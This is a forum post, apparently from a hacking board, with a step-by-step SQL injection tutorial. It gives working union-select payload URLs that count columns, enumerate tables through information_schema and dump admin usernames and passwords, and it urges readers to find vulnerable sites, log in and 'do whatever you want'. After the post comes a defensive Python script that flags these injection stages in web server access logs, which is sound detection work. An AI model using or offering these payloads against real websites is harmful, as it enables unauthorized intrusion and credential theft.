
[Tutorial] Blazer First Sql Injection Tutorial!!!!!



 

1. Find a vulnerable website. Here is an example!

 

2.

http://www.site.com/index.php?=5'

 

PS: Don't type error after this (--)

 

3.

http://www.site.com/index.php?=5 order by 10-- error

 

http://www.site.com/index.php?=5 order by 9-- error

 

http://www.site.com/index.php?=5 order by 8-- No error

:cheers:

 

4. The site has 8 columns.

 

5. Do like below:)

 

6.

http://www.site.com/index.php?=-5 union select 1,2,3,4,5,6,7,8--

 

7. This will show some numbers on the page; let's say it is number 3 on the page.

 

8. Let's get some tables:

http://www.site.com/index.php?=-5 union select 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables--

 

9. You will see tables: check for anything like admin, username, user. I found admin, and let's start harvesting :)

 

10. Type this:

http://www.site.com/index.php?=-5 union select 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_name=database()--

 

11. Now you have the table name, and the name is admin, which you found before this. Now the columns that you will see right now are maybe Username or Password.

 

12. So to get the password and username from admin, type this.

 

13.

http://www.site.com/index.php?=-5 union select 1,2,group_concat(username,0x3a,password),4,5,6,7,8 from admin

 

14. And press enter.

 

15. You will see this: username:password.

PS: The password can be plain text or in a hash :)

16. Now get the admin page and log in and do whatever you want.

 

17. Credits to blazer15. :cheers:

 

I tried my best! But I hope it will help you :) :blackhat:
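
The requests in the steps above leave a recognizable trail in web server access logs. As an added example (not part of the original post), this Python script flags clients whose query strings progress through those stages; the log lines are constructed, and the combined log format, the stage names, the regexes and the parameter name `id` are assumptions of the example.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Stages mirror the steps of the post; names and regexes are this example's own choice.
STAGES = [
    ("column-count probe", re.compile(r"\border\s+by\s+\d+")),
    ("union select", re.compile(r"\bunion\s+(?:all\s+)?select\b")),
    ("schema enumeration", re.compile(r"\binformation_schema\.(?:tables|columns)\b")),
    ("data extraction", re.compile(r"\bgroup_concat\s*\(")),
]
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" \d{3}')

def normalize(query):
    """URL-decode twice (double encoding), strip /**/ comments, fold case and whitespace."""
    text = unquote_plus(unquote_plus(query)).lower()
    text = re.sub(r"/\*.*?\*/", " ", text)
    return re.sub(r"\s+", " ", text)

def stages_in(line):
    """Return (client, [stage names]) for one access-log line, or None if nothing matched."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    query = normalize(urlsplit(target).query)
    hits = [name for name, pat in STAGES if pat.search(query)]
    return (client, hits) if hits else None

def suspicious_clients(lines, min_stages=2):
    """Clients whose requests cover at least min_stages distinct stages, in first-seen order."""
    seen = {}
    for client, hits in filter(None, map(stages_in, lines)):
        bucket = seen.setdefault(client, [])
        bucket.extend(h for h in hits if h not in bucket)
    return {c: s for c, s in seen.items() if len(s) >= min_stages}

# Constructed sample (documentation IP ranges; the parameter name "id" is assumed).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?id=5%20order%20by%2010-- HTTP/1.1" 500 312',
    '203.0.113.7 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?id=5%20order%20by%208-- HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:00:09 +0000] "GET /index.php?id=-5%20UNION/**/SELECT%201,2,3,4,5,6,7,8-- HTTP/1.1" 200 5130',
    '203.0.113.7 - - [01/Jan/2024:10:00:15 +0000] "GET /index.php?id=-5+union+select+1,2,group_concat(table_name),4,5,6,7,8+from+information_schema.tables-- HTTP/1.1" 200 7000',
    '198.51.100.20 - - [01/Jan/2024:10:01:00 +0000] "GET /search.php?q=order%20by%20price HTTP/1.1" 200 4100',
]
if __name__ == "__main__":
    for client, stages in suspicious_clients(SAMPLE_LOG).items():
        print(client, "->", ", ".join(stages))
```

Matching is done on the decoded, lowercased query string, so mixed case, `+` for spaces and inline comments do not hide a request, while an ordinary `order by price` search parameter is not flagged.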

 
